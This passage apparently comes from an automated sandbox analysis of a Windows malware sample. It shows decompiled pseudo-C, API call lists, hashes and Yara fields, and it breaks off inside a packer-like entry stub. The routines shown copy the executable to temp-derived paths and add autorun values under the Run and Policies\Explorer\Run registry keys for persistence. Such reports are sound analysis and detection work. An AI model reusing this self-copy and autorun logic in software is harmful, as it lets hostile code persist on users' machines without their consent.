                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-337-8429955-22614$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-3593519172
                                    • Opcode ID: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction ID: 47032f9d578e649e4c59a246db62157aaca0609ee869790ecbc754fa5fe81585
                                    • Opcode Fuzzy Hash: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction Fuzzy Hash: A6F0A7703403007AD610DA94CC82F9B778CDB41714F50443AF944FA1C0D3BDE9489F2A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
                                    			E00406B54(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				char _v120;
                                    				char _v124;
                                    				char _v128;
                                    				intOrPtr* _t106;
                                    				intOrPtr* _t107;
                                    				intOrPtr* _t108;
                                    				intOrPtr* _t109;
                                    				intOrPtr* _t110;
                                    				void* _t112;
                                    				void* _t126;
                                    				intOrPtr* _t143;
                                    				void* _t154;
                                    				void* _t166;
                                    				CHAR* _t169;
                                    				int _t172;
                                    				int _t186;
                                    				intOrPtr* _t190;
                                    				intOrPtr* _t191;
                                    				intOrPtr* _t192;
                                    				intOrPtr* _t193;
                                    				intOrPtr* _t198;
                                    				void* _t200;
                                    				void* _t201;
                                    				intOrPtr* _t204;
                                    				intOrPtr* _t218;
                                    				intOrPtr* _t226;
                                    				intOrPtr* _t240;
                                    				intOrPtr* _t248;
                                    				intOrPtr* _t258;
                                    				intOrPtr* _t272;
                                    				intOrPtr* _t284;
                                    				intOrPtr _t301;
                                    				intOrPtr* _t313;
                                    				void* _t314;
                                    				intOrPtr* _t315;
                                    				intOrPtr* _t317;
                                    				void* _t321;
                                    				intOrPtr* _t332;
                                    				intOrPtr _t333;
                                    				intOrPtr* _t334;
                                    				intOrPtr* _t338;
                                    				char _t340;
                                    				intOrPtr _t351;
                                    				CHAR* _t392;
                                    				CHAR* _t394;
                                    				intOrPtr _t396;
                                    				intOrPtr _t397;
                                    				void* _t402;
                                    
                                    				_t393 = __esi;
                                    				_t391 = __edi;
                                    				_t396 = _t397;
                                    				_t314 = 0xf;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t314 = _t314 - 1;
                                    				} while (_t314 != 0);
                                    				_push(_t314);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_t313 = __edx;
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t396);
                                    				_push(0x407061);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t397;
                                    				E00401B14(_t313, _v8);
                                    				_t106 =  *0x40d1f0; // 0x40e890
                                    				_t399 =  *_t106;
                                    				if( *_t106 != 0) {
                                    					_t107 =  *0x40d1f0; // 0x40e890
                                    					__eflags =  *_t107 - 1;
                                    					if(__eflags != 0) {
                                    						_t108 =  *0x40d1f0; // 0x40e890
                                    						__eflags =  *_t108 - 2;
                                    						if(__eflags != 0) {
                                    							_t109 =  *0x40d1f0; // 0x40e890
                                    							__eflags =  *_t109 - 3;
                                    							if(__eflags != 0) {
                                    								_t110 =  *0x40d218; // 0x40e894
                                    								_t112 = E00401D50( *_t110);
                                    								_t332 =  *0x40d218; // 0x40e894
                                    								_t333 =  *_t332;
                                    								__eflags =  *((char*)(_t333 + _t112 - 1)) - 0x5c;
                                    								if( *((char*)(_t333 + _t112 - 1)) != 0x5c) {
                                    									_t301 =  *0x40d218; // 0x40e894
                                    									E00401D58(_t301, 0x407078);
                                    								}
                                    								_t334 =  *0x40d218; // 0x40e894
                                    								E00401B58( &_v12,  *_t334);
                                    								E00401CAC( &_v28, E00401F48(_v12));
                                    								E00406684(_v28, _t313, __eflags);
                                    							} else {
                                    								E004061DC( &_v12, _t313, __esi, __eflags);
                                    							}
                                    						} else {
                                    							E00406034( &_v12, _t313, __eflags);
                                    						}
                                    					} else {
                                    						E00405F7C( &_v12, _t313, __eflags);
                                    					}
                                    				} else {
                                    					E00405EF0( &_v12, _t313, _t399);
                                    				}
                                    				if( *((char*)(_v12 + E00401D50(_v12) - 1)) != 0x5c) {
                                    					E00401D58( &_v12, 0x407078);
                                    				}
                                    				_t338 =  *0x40d208; // 0x40e898
                                    				E00401D58( &_v12,  *_t338);
                                    				_t126 = E00401D50(_v12);
                                    				_t340 = _v12;
                                    				_t401 =  *((char*)(_t340 + _t126 - 1)) - 0x5c;
                                    				if( *((char*)(_t340 + _t126 - 1)) != 0x5c) {
                                    					E00401D58( &_v12, 0x407078);
                                    				}
                                    				_t315 =  *0x40d20c; // 0x40e89c
                                    				E00401D9C( &_v16,  *_t315, _v12);
                                    				E00401CAC( &_v32, E00401F48(_v12));
                                    				E00406684(_v32, _t313, _t401); // executed
                                    				E00401CAC( &_v36, E00401F48(_v16));
                                    				E00405A28(_v36, _t313, _t391, _t393, _t401); // executed
                                    				E00405BEC( &_v40, _t313, _t393, _t401); // executed
                                    				_push(_v40);
                                    				_push(0x407078);
                                    				_t143 =  *0x40d208; // 0x40e898
                                    				_push( *_t143);
                                    				E00401E10();
                                    				_t402 =  *((char*)(_v20 + E00401D50(_v20) - 1)) - 0x5c;
                                    				if(_t402 != 0) {
                                    					E00401D58( &_v20, 0x407078);
                                    				}
                                    				_t317 =  *0x40d20c; // 0x40e89c
                                    				E00401D9C( &_v24,  *_t317, _v20);
                                    				E00404740(_v16, _t313,  &_v44, _t391, _t393, _t402);
                                    				_push(_v44);
                                    				E00404740(_v8, _t313,  &_v48, _t391, _t393, _t402);
                                    				_pop(_t154);
                                    				E00401E94(_t154, _v48);
                                    				if(_t402 == 0) {
                                    					L21:
                                    					E00401B14(_t313, _v8);
                                    					goto L40;
                                    				} else {
                                    					E00404740(_v24, _t313,  &_v52, _t391, _t393, _t402);
                                    					_push(_v52);
                                    					E00404740(_v8, _t313,  &_v56, _t391, _t393, _t402);
                                    					_pop(_t166);
                                    					E00401E94(_t166, _v56);
                                    					if(_t402 != 0) {
                                    						_t169 = E00401F48(_v16);
                                    						_t394 = E00401F48(_v8);
                                    						_t172 = CopyFileA(_t394, _t169, 0);
                                    						__eflags = _t172 - 1;
                                    						asm("sbb eax, eax");
                                    						__eflags = _t172 + 1 - 1;
                                    						if(_t172 + 1 != 1) {
                                    							E00401CAC( &_v60, E00401F48(_v20));
                                    							E00406684(_v60, _t313, __eflags);
                                    							_t392 = E00401F48(_v24);
                                    							E00401CAC( &_v64, _t392);
                                    							E00405A28(_v64, _t313, _t392, _t394, __eflags);
                                    							_t186 = CopyFileA(_t394, _t392, 0);
                                    							__eflags = _t186 - 1;
                                    							asm("sbb eax, eax");
                                    							__eflags = _t186 + 1 - 1;
                                    							if(_t186 + 1 != 1) {
                                    								E00401B14(_t313, _v8);
                                    							} else {
                                    								E00401B14(_t313, _v24);
                                    							}
                                    						} else {
                                    							E00401B14(_t313, _v16);
                                    						}
                                    						_t190 =  *0x40d1ec; // 0x40e8ac
                                    						__eflags =  *_t190;
                                    						if( *_t190 != 0) {
                                    							_t248 =  *0x40d1ec; // 0x40e8ac
                                    							E00401CAC( &_v72, E00401F48( *_t248));
                                    							E00406088(0x80000002, _t313, _v72, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v68, 0);
                                    							E00401E94(_v68,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v76, E00401F48( *_t313));
                                    								_t284 =  *0x40d1ec; // 0x40e8ac
                                    								E00401CAC( &_v80, E00401F48( *_t284));
                                    								E00405C4C(0x80000002, _t313, _v80, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v76);
                                    							}
                                    							_t258 =  *0x40d1ec; // 0x40e8ac
                                    							E00401CAC( &_v88, E00401F48( *_t258));
                                    							E00406088(0x80000001, _t313, _v88, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v84, 0);
                                    							E00401E94(_v84,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v92, E00401F48( *_t313));
                                    								_t272 =  *0x40d1ec; // 0x40e8ac
                                    								E00401CAC( &_v96, E00401F48( *_t272));
                                    								E00405C4C(0x80000001, _t313, _v96, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v92);
                                    							}
                                    						}
                                    						_t191 =  *0x40d1d8; // 0x40e8a4
                                    						__eflags =  *_t191;
                                    						if( *_t191 != 0) {
                                    							_t226 =  *0x40d1d8; // 0x40e8a4
                                    							E00401CAC( &_v104, E00401F48( *_t226));
                                    							E00406088(0x80000002, _t313, _v104, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v100, 0);
                                    							E00401E94(_v100,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v108, E00401F48( *_t313));
                                    								_t240 =  *0x40d1d8; // 0x40e8a4
                                    								E00401CAC( &_v112, E00401F48( *_t240));
                                    								E00405C4C(0x80000002, _t313, _v112, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v108);
                                    							}
                                    						}
                                    						_t192 =  *0x40d1e0; // 0x40e8a8
                                    						__eflags =  *_t192;
                                    						if( *_t192 != 0) {
                                    							_t204 =  *0x40d1e0; // 0x40e8a8
                                    							E00401CAC( &_v120, E00401F48( *_t204));
                                    							E00406088(0x80000001, _t313, _v120, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v116, 0);
                                    							E00401E94(_v116,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v124, E00401F48( *_t313));
                                    								_t218 =  *0x40d1e0; // 0x40e8a8
                                    								E00401CAC( &_v128, E00401F48( *_t218));
                                    								E00405C4C(0x80000001, _t313, _v128, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v124);
                                    							}
                                    						}
                                    						_t193 =  *0x40d1e4; // 0x40e8a0
                                    						__eflags =  *_t193;
                                    						if( *_t193 != 0) {
                                    							_push(0x4070fc);
                                    							_push(E00406840(1));
                                    							_push(E00401F48( *_t313));
                                    							_t198 =  *0x40d1e4; // 0x40e8a0
                                    							_t200 = E00401F48( *_t198);
                                    							_pop(_t321);
                                    							_pop(_t201);
                                    							E00406ADC(_t201, _t321, _t200, __eflags);
                                    						}
                                    						L40:
                                    						_pop(_t351);
                                    						 *[fs:eax] = _t351;
                                    						_push(E00407068);
                                    						return E00401AE4( &_v128, 0x1f);
                                    					}
                                    					goto L21;
                                    				}
                                    			}
                                    0x00406b54
                                    0x00406b54
                                    0x00406b55
                                    0x00406b57
                                    0x00406b5c
                                    0x00406b5c
                                    0x00406b5e
                                    0x00406b60
                                    0x00406b60
                                    0x00406b63
                                    0x00406b65
                                    0x00406b66
                                    0x00406b67
                                    0x00406b69
                                    0x00406b6f
                                    0x00406b76
                                    0x00406b77
                                    0x00406b7c
                                    0x00406b7f
                                    0x00406b87
                                    0x00406b8c
                                    0x00406b91
                                    0x00406b94
                                    0x00406ba3
                                    0x00406ba8
                                    0x00406bab
                                    0x00406bba
                                    0x00406bbf
                                    0x00406bc2
                                    0x00406bce
                                    0x00406bd3
                                    0x00406bd6
                                    0x00406be2
                                    0x00406be9
                                    0x00406bee
                                    0x00406bf4
                                    0x00406bf6
                                    0x00406bfb
                                    0x00406bfd
                                    0x00406c07
                                    0x00406c0c
                                    0x00406c14
                                    0x00406c1c
                                    0x00406c2e
                                    0x00406c36
                                    0x00406bd8
                                    0x00406bdb
                                    0x00406bdb
                                    0x00406bc4
                                    0x00406bc7
                                    0x00406bc7
                                    0x00406bad
                                    0x00406bb0
                                    0x00406bb0
                                    0x00406b96
                                    0x00406b99
                                    0x00406b99
                                    0x00406c4b
                                    0x00406c55
                                    0x00406c55
                                    0x00406c5d
                                    0x00406c65
                                    0x00406c6d
                                    0x00406c72
                                    0x00406c75
                                    0x00406c7a
                                    0x00406c84
                                    0x00406c84
                                    0x00406c89
                                    0x00406c97
                                    0x00406ca9
                                    0x00406cb1
                                    0x00406cc3
                                    0x00406ccb
                                    0x00406cd3
                                    0x00406cd8
                                    0x00406cdb
                                    0x00406ce0
                                    0x00406ce5
                                    0x00406cef
                                    0x00406cff
                                    0x00406d04
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d13
                                    0x00406d21
                                    0x00406d2c
                                    0x00406d34
                                    0x00406d3b
                                    0x00406d43
                                    0x00406d44
                                    0x00406d49
                                    0x00406d70
                                    0x00406d75
                                    0x00000000
                                    0x00406d4b
                                    0x00406d51
                                    0x00406d59
                                    0x00406d60
                                    0x00406d68
                                    0x00406d69
                                    0x00406d6e
                                    0x00406d84
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9a
                                    0x00406d9d
                                    0x00406da0
                                    0x00406da2
                                    0x00406dbd
                                    0x00406dc5
                                    0x00406dd2
                                    0x00406dd9
                                    0x00406de1
                                    0x00406dea
                                    0x00406def
                                    0x00406df2
                                    0x00406df5
                                    0x00406df7
                                    0x00406e0a
                                    0x00406df9
                                    0x00406dfe
                                    0x00406dfe
                                    0x00406da4
                                    0x00406da9
                                    0x00406da9
                                    0x00406e0f
                                    0x00406e14
                                    0x00406e17
                                    0x00406e23
                                    0x00406e34
                                    0x00406e46
                                    0x00406e50
                                    0x00406e55
                                    0x00406e63
                                    0x00406e6c
                                    0x00406e7d
                                    0x00406e8f
                                    0x00406e8f
                                    0x00406e9a
                                    0x00406eab
                                    0x00406ebd
                                    0x00406ec7
                                    0x00406ecc
                                    0x00406eda
                                    0x00406ee3
                                    0x00406ef4
                                    0x00406f06
                                    0x00406f06
                                    0x00406ecc
                                    0x00406f0b
                                    0x00406f10
                                    0x00406f13
                                    0x00406f1b
                                    0x00406f2c
                                    0x00406f3e
                                    0x00406f48
                                    0x00406f4d
                                    0x00406f5b
                                    0x00406f64
                                    0x00406f75
                                    0x00406f87
                                    0x00406f87
                                    0x00406f4d
                                    0x00406f8c
                                    0x00406f91
                                    0x00406f94
                                    0x00406f9c
                                    0x00406fad
                                    0x00406fbf
                                    0x00406fc9
                                    0x00406fce
                                    0x00406fdc
                                    0x00406fe5
                                    0x00406ff6
                                    0x00407008
                                    0x00407008
                                    0x00406fce
                                    0x0040700d
                                    0x00407012
                                    0x00407015
                                    0x00407017
                                    0x00407028
                                    0x00407030
                                    0x00407031
                                    0x00407038
                                    0x0040703f
                                    0x00407040
                                    0x00407041
                                    0x00407041
                                    0x00407046
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x00407060
                                    0x00407060
                                    0x00000000
                                    0x00406d6e

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406D95
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406DEA
                                      • Part of subcall function 00406088: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                      • Part of subcall function 00406088: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                      • Part of subcall function 00405C4C: RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 00405C92
                                      • Part of subcall function 00405C4C: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CBA
                                      • Part of subcall function 00405C4C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCopyFileQuery$CreateOpen
                                    • String ID: 4h@$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run
                                    • API String ID: 1469814539-1189044031
                                    • Opcode ID: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction ID: 0337d0d0e41828abccd6a10b42b8af73d9b7eafca3f8209fdc2fdaca8a3f3fd1
                                    • Opcode Fuzzy Hash: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction Fuzzy Hash: 13E1FC34A041099FDB11EBA9C881A9EB3B5AF45308F60417BF405BB2F6DB38AD45CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 31%
                                    			E004019D8() {
                                    				struct HINSTANCE__* _t24;
                                    				intOrPtr _t32;
                                    				void* _t42;
                                    
                                    				if( *0x0040E5BC != 0 ||  *0x40e024 == 0) {
                                    					L3:
                                    					if( *0x40d004 != 0) {
                                    						 *0x40d068();
                                    					}
                                    					L5:
                                    					while(1) {
                                    						if( *((char*)(0x40e5bc)) == 2 &&  *0x40d000 == 0) {
                                    							 *0x0040E5A0 = 0;
                                    						}
                                    						 *0x40d030();
                                    						if( *((char*)(0x40e5bc)) <= 1 ||  *0x40d000 != 0) {
                                    							if( *0x0040E5A4 != 0) {
                                    								 *0x40d01c();
                                    								_t32 =  *((intOrPtr*)(0x40e5a4));
                                    								_t7 = _t32 + 0x10; // 0x0
                                    								_t24 =  *_t7;
                                    								_t8 = _t32 + 4; // 0x400000
                                    								if(_t24 !=  *_t8 && _t24 != 0) {
                                    									FreeLibrary(_t24);
                                    								}
                                    							}
                                    						}
                                    						 *0x40d034();
                                    						if( *((char*)(0x40e5bc)) == 1) {
                                    							 *0x0040E5B8();
                                    						}
                                    						if( *((char*)(0x40e5bc)) != 0) {
                                    							E004019A8();
                                    						}
                                    						if( *0x40e594 == 0) {
                                    							if( *0x40e014 != 0) {
                                    								 *0x40e014();
                                    							}
                                    							ExitProcess( *0x40d000); // executed
                                    						}
                                    						memcpy(0x40e594,  *0x40e594, 0xb << 2);
                                    						_t42 = _t42 + 0xc;
                                    						0x40d000 = 0x40d000;
                                    					}
                                    				} else {
                                    					do {
                                    						 *0x40e024 = 0;
                                    						 *((intOrPtr*)( *0x40e024))();
                                    					} while ( *0x40e024 != 0);
                                    					goto L3;
                                    				}
                                    			}






                                    0x004019ef
                                    0x00401a07
                                    0x00401a0e
                                    0x00401a10
                                    0x00401a10
                                    0x00000000
                                    0x00401a16
                                    0x00401a1a
                                    0x00401a23
                                    0x00401a23
                                    0x00401a26
                                    0x00401a30
                                    0x00401a3c
                                    0x00401a3e
                                    0x00401a44
                                    0x00401a47
                                    0x00401a47
                                    0x00401a4a
                                    0x00401a4d
                                    0x00401a54
                                    0x00401a54
                                    0x00401a4d
                                    0x00401a3c
                                    0x00401a59
                                    0x00401a63
                                    0x00401a65
                                    0x00401a65
                                    0x00401a6c
                                    0x00401a6e
                                    0x00401a6e
                                    0x00401a76
                                    0x00401a7f
                                    0x00401a81
                                    0x00401a81
                                    0x00401a8a
                                    0x00401a8a
                                    0x00401a9b
                                    0x00401a9b
                                    0x00401a9d
                                    0x00401a9d
                                    0x004019f6
                                    0x004019f6
                                    0x004019fc
                                    0x00401a00
                                    0x00401a02
                                    0x00000000
                                    0x004019f6

                                    APIs
                                    • FreeLibrary.KERNEL32(00400000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A54
                                    • ExitProcess.KERNEL32(00000000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitFreeLibraryProcess
                                    • String ID: @&@$@&@$D0@
                                    • API String ID: 1404682716-1618351410
                                    • Opcode ID: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction ID: 5263b8d098c20f51001af61e3d55436e18b8afc55997b24df4f1e0aa037ee43b
                                    • Opcode Fuzzy Hash: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction Fuzzy Hash: 4521AF70A022418FEB209FA5C9887537BE5AF44318F284476D848AA2E2C77CCCC5CF5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405EAC(long __eax, CHAR* __edx) {
                                    				long _t4;
                                    				long _t5;
                                    				CHAR* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				GetProcAddress(LoadLibraryA("kernel32.dll"), "GetTempPathA");
                                    				_t4 = GetTempPathA(_t5, _t7); // executed
                                    				return _t4;
                                    			}






                                    0x00405eae
                                    0x00405eb0
                                    0x00405ec2
                                    0x00405ec9
                                    0x00405ecd

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00405EBC
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405EC2
                                    • GetTempPathA.KERNELBASE(00000105,?,00000000,kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?), ref: 00405EC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadPathProcTemp
                                    • String ID: GetTempPathA$kernel32.dll
                                    • API String ID: 1686214323-3269217876
                                    • Opcode ID: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction ID: ddb0b176c331170ea1d21e324cbd039c108f0085b782601a862f0faf436c2439
                                    • Opcode Fuzzy Hash: ae85f7ca30a4ebc3f898838e590f98755c29af6d739c50bb3d1863989f8de6f9
                                    • Instruction Fuzzy Hash: CCC08CB121162035E5207AF60C8AE97084CCC842A632408337004F22C294BE1E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			_entry_(void* __eflags, void* __fp0) {
                                    				char _v24;
                                    				char _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v128;
                                    				void* _t64;
                                    				void* _t65;
                                    				signed int _t66;
                                    				intOrPtr _t67;
                                    				intOrPtr _t68;
                                    				signed int _t70;
                                    				signed int _t71;
                                    				unsigned int _t72;
                                    				char _t82;
                                    				signed char* _t84;
                                    				long _t85;
                                    				char* _t88;
                                    				void* _t92;
                                    				long _t93;
                                    				void* _t95;
                                    				void* _t98;
                                    				intOrPtr* _t108;
                                    				void* _t111;
                                    				long _t112;
                                    				char* _t123;
                                    				intOrPtr* _t136;
                                    				long _t140;
                                    				intOrPtr* _t143;
                                    				long _t147;
                                    				intOrPtr* _t150;
                                    				long _t154;
                                    				struct HINSTANCE__* _t157;
                                    				struct HINSTANCE__* _t160;
                                    				signed int _t163;
                                    				signed int _t255;
                                    				signed int _t259;
                                    				signed int _t260;
                                    				signed int _t261;
                                    				signed int _t262;
                                    				void* _t266;
                                    				void* _t267;
                                    				void* _t268;
                                    				void* _t269;
                                    				char* _t271;
                                    				signed int _t272;
                                    				signed int _t274;
                                    				void* _t277;
                                    				void* _t278;
                                    				void* _t279;
                                    				void* _t280;
                                    				void* _t281;
                                    				void* _t282;
                                    				void* _t283;
                                    				intOrPtr* _t285;
                                    				intOrPtr _t291;
                                    				signed int _t316;
                                    				unsigned int* _t317;
                                    				CHAR* _t319;
                                    				void* _t320;
                                    				char* _t321;
                                    				signed int _t322;
                                    				unsigned int* _t323;
                                    				signed int _t324;
                                    				struct HINSTANCE__* _t325;
                                    				unsigned int _t326;
                                    				intOrPtr _t327;
                                    				DWORD* _t328;
                                    				intOrPtr _t329;
                                    				void* _t330;
                                    				signed int _t332;
                                    				void* _t335;
                                    
                                    				_t335 = __fp0;
                                    				_t330 = __eflags;
                                    				asm("pushad");
                                    				_t322 = 0x412000;
                                    				_t1 = _t322 - 0x11000; // 0x401000
                                    				_t316 = _t1;
                                    				_push(_t316);
                                    				_t325 = _t324 | 0xffffffff;
                                    				while(1) {
                                    					_t259 =  *_t322;
                                    					_t322 = _t322 - 0xfffffffc;
                                    					asm("adc ebx, ebx");
                                    					do {
                                    						if(_t330 < 0) {
                                    							_t64 =  *_t322;
                                    							_t322 = _t322 + 1;
                                    							 *_t316 = _t64;
                                    							_t316 = _t316 + 1;
                                    							__eflags = _t316;
                                    							goto L47;
                                    						}
                                    						_t65 = 1;
                                    						while(1) {
                                    							_t260 = _t259 + _t259;
                                    							if(_t260 == 0) {
                                    								_t260 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t261 = _t260 + _t260;
                                    							_t332 = _t261;
                                    							if(_t332 >= 0) {
                                    								goto L56;
                                    							}
                                    							L54:
                                    							if(_t332 != 0) {
                                    								L62:
                                    								_t272 = 0;
                                    								_t66 = _t65 - 3;
                                    								__eflags = _t66;
                                    								if(_t66 < 0) {
                                    									_t261 = _t261 + _t261;
                                    									__eflags = _t261;
                                    									if(__eflags == 0) {
                                    										_t261 =  *_t322;
                                    										_t322 = _t322 - 0xfffffffc;
                                    										asm("adc ebx, ebx");
                                    									}
                                    									L67:
                                    									if(__eflags < 0) {
                                    										L59:
                                    										_t259 = _t261 + _t261;
                                    										__eflags = _t259;
                                    										if(_t259 == 0) {
                                    											_t259 =  *_t322;
                                    											_t322 = _t322 - 0xfffffffc;
                                    											asm("adc ebx, ebx");
                                    										}
                                    										asm("adc ecx, ecx");
                                    										L77:
                                    										__eflags = _t325 - 0xfffffb00;
                                    										asm("adc ecx, 0x2");
                                    										_t285 = _t325 + _t316;
                                    										__eflags = _t325 - 0xfffffffc;
                                    										if(_t325 <= 0xfffffffc) {
                                    											do {
                                    												_t67 =  *_t285;
                                    												_t285 = _t285 + 4;
                                    												 *_t316 = _t67;
                                    												_t316 = _t316 + 4;
                                    												_t272 = _t272 - 4;
                                    												__eflags = _t272;
                                    											} while (_t272 > 0);
                                    											_t316 = _t316 + _t272;
                                    											break;
                                    										} else {
                                    											goto L78;
                                    										}
                                    										do {
                                    											L78:
                                    											_t68 =  *_t285;
                                    											_t285 = _t285 + 1;
                                    											 *_t316 = _t68;
                                    											_t316 = _t316 + 1;
                                    											_t272 = _t272 - 1;
                                    											__eflags = _t272;
                                    										} while (_t272 != 0);
                                    										break;
                                    									}
                                    									_t272 = _t272 + 1;
                                    									_t261 = _t261 + _t261;
                                    									__eflags = _t261;
                                    									if(__eflags == 0) {
                                    										_t261 =  *_t322;
                                    										_t322 = _t322 - 0xfffffffc;
                                    										asm("adc ebx, ebx");
                                    									}
                                    									if(__eflags < 0) {
                                    										goto L59;
                                    									} else {
                                    										goto L71;
                                    										do {
                                    											do {
                                    												L71:
                                    												_t262 = _t261 + _t261;
                                    												__eflags = _t262;
                                    												if(_t262 == 0) {
                                    													_t262 =  *_t322;
